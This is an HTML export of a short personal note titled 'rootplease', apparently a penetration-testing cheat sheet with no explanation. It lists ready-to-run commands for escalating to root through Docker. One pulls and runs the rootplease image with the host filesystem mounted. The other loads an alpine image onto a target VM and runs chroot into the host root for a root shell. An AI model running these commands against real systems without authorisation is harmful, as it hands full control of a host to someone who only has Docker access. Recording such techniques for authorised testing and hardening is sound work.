<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>rootplease</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>rootplease</h1>

      <div class="ck-content"><pre><code class="language-text-plain">docker pull chrisfosterelli/rootplease
docker run -v /:/hostOS -it --rm chrisfosterelli/rootplease</code></pre>

        <p>For alpine:</p><pre><code class="language-text-plain">docker save -o alpine.tar alpine
#upload alpine.tar to vm
docker load &lt; alpine.tar  
docker run -v /:/mnt --rm -it alpine chroot /mnt sh</code></pre>

        <p> </p>
      </div>
    </div>
  </body>

</html>